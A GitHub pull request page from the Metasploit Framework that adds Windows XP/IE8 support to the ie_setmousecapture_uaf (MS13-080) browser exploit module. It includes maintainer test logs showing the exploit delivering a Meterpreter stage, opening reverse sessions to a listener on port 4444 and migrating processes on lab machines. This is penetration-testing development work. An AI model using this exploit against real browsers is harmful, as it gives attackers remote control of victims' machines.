win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014

@webstersprodigy
Contributor

webstersprodigy commented Nov 15, 2014

ie_setmousecapture_uaf only supported IE9 on Windows 7, but the vuln was present in different versions of IE. I tested with Windows XP SP3 and IE8 and the exploit works pretty reliably (I included the specific mshtml version in the code). I did not test that I did not break the Win7 IE9 exploit, as I didn't have that setup (but nothing there should have changed).

This pull request is probably not very useful in real life; I was just messing around.

@wchen-r7 wchen-r7 added the module label Nov 16, 2014

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014

@todb-r7 todb-r7 added the feature label Nov 17, 2014

@wchen-r7
Contributor

wchen-r7 commented Nov 22, 2014

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7
Contributor

wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 

wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014

Resolve merge conflict for ie_setmousecapture_uaf (#4213)
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed

wchen-r7 added a commit that referenced this pull request Dec 3, 2014
